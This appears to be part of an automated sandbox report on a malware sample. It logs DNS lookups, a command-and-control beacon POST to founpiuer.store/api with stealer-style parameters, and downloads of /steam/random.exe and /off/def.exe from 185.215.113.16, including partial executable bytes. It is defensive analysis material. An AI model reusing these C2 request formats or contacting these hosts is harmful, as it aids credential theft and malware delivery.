                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.042172909 CET1.1.1.1192.168.2.50x7a00No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.042172909 CET1.1.1.1192.168.2.50x7a00No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.042172909 CET1.1.1.1192.168.2.50x7a00No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.042172909 CET1.1.1.1192.168.2.50x7a00No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.042773008 CET1.1.1.1192.168.2.50xa9e7No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.042773008 CET1.1.1.1192.168.2.50xa9e7No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.560128927 CET1.1.1.1192.168.2.50x2dbfNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.560128927 CET1.1.1.1192.168.2.50x2dbfNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.560128927 CET1.1.1.1192.168.2.50x2dbfNo error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.560128927 CET1.1.1.1192.168.2.50x2dbfNo error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.562280893 CET1.1.1.1192.168.2.50x2d27No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.587429047 CET1.1.1.1192.168.2.50xe53No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.587429047 CET1.1.1.1192.168.2.50xe53No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.588112116 CET1.1.1.1192.168.2.50x3ccdNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.588112116 CET1.1.1.1192.168.2.50x3ccdNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.588112116 CET1.1.1.1192.168.2.50x3ccdNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.588112116 CET1.1.1.1192.168.2.50x3ccdNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.588112116 CET1.1.1.1192.168.2.50x3ccdNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.621232986 CET1.1.1.1192.168.2.50xd1d4No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.621484995 CET1.1.1.1192.168.2.50x80a2No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.316559076 CET1.1.1.1192.168.2.50x9ac1No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.327826977 CET1.1.1.1192.168.2.50x4d2No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:42.973107100 CET1.1.1.1192.168.2.50x78eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:42.985372066 CET1.1.1.1192.168.2.50xdd5bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.870930910 CET1.1.1.1192.168.2.50x71dfNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.871717930 CET1.1.1.1192.168.2.50xe2b9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                            • founpiuer.store
                                                                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                                                                            • otelrules.azureedge.net
                                                                                                                                                                                                                            • https:
                                                                                                                                                                                                                              • wcpstatic.microsoft.com
                                                                                                                                                                                                                              • js.monitor.azure.com
                                                                                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.549718185.215.113.16805508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.423954010 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Host: 185.215.113.16


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.549719185.215.113.16805508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 6, 2024 14:39:17.258069038 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.185947895 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:18 GMT
                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                            Content-Length: 2787328
                                                                                                                                                                                                                            Last-Modified: Wed, 06 Nov 2024 12:54:05 GMT
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            ETag: "672b66ed-2a8800"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 de d4 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+*`Ui` @ @.rsrc`2@.idata 8@ikimsxoe@*(*:@vkeosczs *b*@.taggant@+"f*@
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.185970068 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.185981989 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186026096 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186038971 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186058044 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186070919 CET548INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186094999 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186106920 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186119080 CET1236INData Raw: bd 8a 06 09 da 61 5b 8e e6 59 c4 35 70 17 fa 16 25 8e d9 25 01 ae b8 ca 4a 27 15 1d 14 1e ea 59 fe 30 02 8e 0f 9e ca 85 65 12 be 93 55 48 b5 b1 77 18 06 2e c8 e4 3d 74 4f b2 bf 97 c8 23 b8 1d cc 70 b8 a8 95 96 9a 4c a3 10 d4 65 de 56 d2 eb e3 19
                                                                                                                                                                                                                            Data Ascii: a[Y5p%%J'Y0eUHw.=tO#pLeV8b_*c2&W'HJDyF(HVP_G+:Gu$:k}z{"/|6_y-Z5k2!MQ.G
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.191031933 CET1236INData Raw: 21 38 07 f5 4f 5f 30 d1 27 23 cf e2 53 48 e4 2c 1a 48 2d 59 52 c9 f3 3b e3 2b 28 2c 7e 67 d2 11 8c 3a bd 1a e9 5c b1 fd 1e a7 f2 d9 89 ba 32 0f ca 31 fd aa d0 4f bc ee 44 29 c5 f0 d5 3c c4 9a 21 f2 cf ca 08 67 2b b4 22 f8 c5 de 2f b5 e9 31 c7 87
                                                                                                                                                                                                                            Data Ascii: !8O_0'#SH,H-YR;+(,~g:\21OD)<!g+"/10kws%*$$h*e"2Zg-kI!/3.GOvX9ow4\$.r)Jh2c A&1s%CX5<NK*>0 R("{tzI


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.549704104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                            Host: founpiuer.store
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC554INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:38:58 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZlLxsEOtGHTcyeA9Fmqjuzc1O4eUunw2o4pkd0TjwM4eF5U5FYleyOAk%2BLi0NaIfMvKXN0KXVtfXdA6T1yNVyRCPCdyoeOrhhxN%2BrpKOXKgmSHyEEZClAX9e%2B4aW0EoVbkU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57ca9bf253aaf-DFW
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC815INData Raw: 31 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                            Data Ascii: 1154<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC1369INData Raw: 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63
                                                                                                                                                                                                                            Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC1369INData Raw: 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e
                                                                                                                                                                                                                            Data Ascii: gement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <in
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC891INData Raw: 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d
                                                                                                                                                                                                                            Data Ascii: > <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id=
                                                                                                                                                                                                                            2024-11-06 13:38:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.549705104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:38:59 UTC352OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                            Cookie: __cf_mw_byp=c77U7F.gPJAmjz5RNTSkMPHI.8x_tiIP5OX3.2Px_Jw-1730900338-0.0.1.1-/api
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 52
                                                                                                                                                                                                                            Host: founpiuer.store
                                                                                                                                                                                                                            2024-11-06 13:38:59 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:38:59 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=hhi485qf5jma51ui18bfqmo7kh; expires=Sun, 02-Mar-2025 07:25:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MKWj60FJZxSWsaEJRgFblKLsphy2KsNSkLpWJph8yoCcfGbE1nDi8GBEJfhNUu9IwC1xCLQqV%2BzNbdAakTeY4YX5DOrVDQ%2Bv%2Fo3uZ%2FRYSokTffiWVc%2FgCIUrbFVXdgl16s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57cb0efc52cce-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1301&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1040&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=0c8cfe6fb6d4aebc&ts=767&x=0"
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC355INData Raw: 63 63 61 0d 0a 35 77 73 70 50 37 6d 69 68 6c 62 52 4b 56 46 62 2f 59 54 73 6d 48 6b 71 57 59 30 6c 56 6c 2b 73 52 55 50 57 6e 74 63 72 45 77 32 63 4b 56 38 64 67 35 61 71 64 4b 4a 4d 63 32 47 4a 39 70 6e 39 56 51 67 34 36 51 64 73 4f 63 30 70 4d 4c 4f 79 39 56 31 2b 4c 39 31 74 53 46 50 4b 78 36 70 30 74 46 46 7a 59 61 62 2f 7a 76 30 58 43 47 4f 76 51 44 77 39 7a 53 6b 68 74 2f 57 34 57 33 39 75 6a 32 64 4f 56 39 7a 42 34 6a 65 39 52 44 51 2b 6d 4f 57 47 39 68 42 48 4d 65 41 48 65 6e 33 4a 50 32 48 73 76 4a 70 4f 5a 32 79 71 61 6c 70 55 6d 39 2b 71 4c 66 4e 4d 50 33 6e 48 70 6f 33 39 47 30 59 2f 36 55 34 2b 4e 38 51 68 49 4c 4c 30 70 30 4a 31 5a 59 39 70 54 56 62 57 79 50 59 36 74 30 4d 2f 4f 4a 4c 6c 7a 72 52 62 54 79 4f 76 48 33 52 75 2f 43 51 77 70 65
                                                                                                                                                                                                                            Data Ascii: cca5wspP7mihlbRKVFb/YTsmHkqWY0lVl+sRUPWntcrEw2cKV8dg5aqdKJMc2GJ9pn9VQg46QdsOc0pMLOy9V1+L91tSFPKx6p0tFFzYab/zv0XCGOvQDw9zSkht/W4W39uj2dOV9zB4je9RDQ+mOWG9hBHMeAHen3JP2HsvJpOZ2yqalpUm9+qLfNMP3nHpo39G0Y/6U4+N8QhILL0p0J1ZY9pTVbWyPY6t0M/OJLlzrRbTyOvH3Ru/CQwpe
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1369INData Raw: 51 6d 75 30 41 34 50 49 33 74 68 2f 63 57 53 44 62 6c 53 44 63 39 79 53 30 72 75 2f 61 78 52 48 78 70 68 57 6b 4c 45 35 76 48 2f 48 54 72 43 78 41 38 6a 2b 47 43 37 46 6c 79 65 2f 41 4a 4c 58 33 4a 4b 32 48 73 76 4c 31 4d 63 6d 79 4f 5a 6b 68 56 30 4e 4c 6b 4a 72 56 47 4e 69 75 5a 34 34 44 77 47 46 6f 78 34 55 45 33 4e 4d 55 75 4a 4c 50 34 39 51 63 78 61 4a 30 70 45 78 33 36 7a 65 38 34 75 56 77 7a 65 59 43 6f 6c 37 6f 63 52 48 75 33 42 7a 41 38 79 69 59 6c 75 76 4b 78 52 58 64 68 69 47 5a 4e 56 39 76 48 37 6a 79 37 53 6a 34 79 6b 4f 61 4c 39 78 39 4f 4e 2b 35 43 64 48 4f 4f 49 44 6e 30 70 50 56 6e 64 6d 79 58 4b 33 35 65 31 63 37 6a 49 76 4e 55 66 53 44 66 34 59 4b 36 51 77 67 31 36 6b 67 6d 50 4e 77 69 4c 36 62 77 73 45 39 38 62 49 74 70 54 6c 72 57 7a
